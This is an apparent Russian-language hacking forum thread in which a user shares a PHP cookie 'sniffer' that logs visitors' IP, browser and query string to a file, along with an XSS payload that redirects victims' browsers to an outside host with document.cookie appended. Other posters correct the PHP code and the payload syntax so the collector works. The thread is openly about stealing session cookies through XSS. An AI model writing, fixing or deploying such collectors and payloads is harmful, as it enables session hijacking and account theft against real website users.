Вот пишу PHP снифер, смотрите, что получилось:

<?php
$date = date("h:i:s A (d.m.Y)");
$inf = "Date: $date\nIP: $REMOTE_ADDR\nAgent: $HTTP_USER_AGENT\nCookie: $QUERY_STRING\n-----------------\n\n";
$fp = fopen("info.txt", "a");
fwrite($fp, $inf);
fclose($fp);
?>

Когда задаю в XSS что-то типа "<script>document.location="http://driska.name/snifer.php"+document.cookie</script>" нихрена не приходят отчёты

php.net/register_globals
location='http://xx';

"http://example.com/qwe.php?" + ...

php.net/register_globals
location='http://xx';
Я просто описался в посте

А снифер то я правильно написал?

Вы товарищ помоему читали старую книжку по php))

<?php
$date = date('h:i:s - d.m.Y');
$inf = "Date: $date\n IP: $_SERVER['REMOTE_ADDR']\n Agent: $_SERVER['HTTP_USER_AGENT']\n Cookie: $_SERVER['QUERY_STRING']\n-----------------\r\n";
$fp = fopen('info.txt', 'a+');
fwrite($fp, $inf);
fclose($fp);
?>

хотя бы так, но лучше использовать одинарные кавычки (кроме где \n)

А снифер то я правильно написал?
нет.

нет.

А поконкретнее? :mad:

http://ru2.php.net/manual/ru/reserved.variables.server.php
http://ru2.php.net/manual/ru/language.basic-syntax.php
php.net/register_globals

Исправил бы ошибки не умничая....

ну раз лень, так иди в пень.

Ru}{eeZ
я выше запостил исправленный код.
Более того, здесь тебе никто ничем не обязан.

ну раз лень, так иди в пень.
рэп?

сила рифмованых строк :d